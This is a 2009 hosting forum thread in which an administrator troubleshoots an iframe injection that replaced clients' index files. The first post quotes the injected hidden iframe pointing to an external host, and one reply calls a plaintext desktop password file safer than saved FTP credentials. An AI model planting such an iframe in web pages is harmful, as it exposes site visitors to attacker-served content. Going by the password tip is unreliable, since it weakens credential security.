The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Iframe attack problem

Discussion in 'General Discussion' started by myeddie7, Dec 19, 2009.

  1. myeddie7

    myeddie7 Member

    Joined:
    Sep 22, 2007
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    I have a few clients who had iframe attack. It replaced all index files in many of their directory. The code looks like below;

    PHP:
    <iframe qhdik='gpPJWim3' src='http://1analytics.ws/in.cgi?7' rybbb='Yv9nZtVg' width='0' height='0' style='display:none'></iframe>
    Why/how does this problem happen ? Is it the server problem ? or does it come from client's files itself ? because they have already changed their passwords to strong ones.

    We also use mod_security and have firewall (csf) installed in our server.

    Thanks
     
  2. derfuhrer2007

    derfuhrer2007 Member

    Joined:
    Dec 15, 2009
    Messages:
    18
    Likes Received:
    0
    Trophy Points:
    1
    In almost all cases it is the clients computer that got virused, it is not a server issue.
     
  3. madaboutlinux

    madaboutlinux Well-Known Member

    Joined:
    Jan 24, 2005
    Messages:
    1,052
    Likes Received:
    2
    Trophy Points:
    38
    Location:
    Earth
    In iframe injection, majority of the time it's the clients computer which has got viruses/spywares and the passwords are hacked. Once the password is cracked, the files are then uploaded using Ftp.

    If you haven't changed the files yet, ask your host to check when the files were actually injected and to check the Ftp logs in /var/log/messages file.
     
  4. myeddie7

    myeddie7 Member

    Joined:
    Sep 22, 2007
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    The problem is the client don't believe that the problem really comes from their side/pc.They claimed that they are an expert in PC and very much sure that their PC has go no virus/spyware problem.

    I myself manage the server, and from /var/log/messages log, I found that that there was download/upload frmo client accounts from overseas IP.

    It's just that I don't know, how the client's username/password had been exposed to others.

    In the server, there are about 500 accounts, and only 2 or 3 clients who always have iframe problem.

    Thanks
     
  5. Data 1

    Data 1 Well-Known Member

    Joined:
    May 25, 2008
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Columbus Ohio
    cPanel Access Level:
    DataCenter Provider
    The IP will be spoofed but if you check the log I bet it was uploaded as that user, just not with their IP.

    I have experienced this many times (some recently) and in most cases the logs will state it was uploaded by the username of the site. If the name near the end of the log string is the username on the account, at BEST they have an easy password and it was guessed. At worst it was a virus on their computer.

    A good argument for not saving passwords in FTP/SSH programs. It is actually safer to have a text file on your desktop named "passwords_for_ftp_sites.txt" than to save them in the actual program.
     
  6. madaboutlinux

    madaboutlinux Well-Known Member

    Joined:
    Jan 24, 2005
    Messages:
    1,052
    Likes Received:
    2
    Trophy Points:
    38
    Location:
    Earth
    Mostly it's a virus on the clients computer which results in password being hacked and sites been injected.
     
  7. trevHCS

    trevHCS Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    69
    Likes Received:
    1
    Trophy Points:
    8
    Another common one is if the pages are generated dynamically involving a database they might well have dodgy code on their site which is allowing SQL injection attacks.

    Check for any databases and if they have any, look inside them for "iframe" or similar. In that case again it's their problem. Mind you, could charge them for potentially damaging your servers.

    As for the "computer expert" routine - if they were that much of an expert they'd be running their own servers, so dismiss that as total codswallop. What they mean if they think they know what they're doing, thus they're 10x more dangerous than my mother on a computer. :)

    Saw an FTP root kit virus a couple of years back that no AV program seemed to be able to spot. Eventually tracked via a packet sniffer and an Fprot root kit sniffer program, but was quite clever in that it didn't do the same change more than once.

    So unless they're packet sniffing and such like they ain't a computer expert and therefore should be treated with the same contempt as a double glazing salesman.

    Trev
     
  8. myeddie7

    myeddie7 Member

    Joined:
    Sep 22, 2007
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    I also always remind our clients to always becareful with the scripts they are using, especially plugin/addon script.

    Because the script they are using may be the cause of their problem.

    BTW, we have mod_security to block 'SQL injection attack'


    Thanks
     
Loading...
Similar Threads - Iframe attack problem
  1. ApparentMedia
    Replies:
    1
    Views:
    425
  2. sahostking
    Replies:
    5
    Views:
    31,413

Share This Page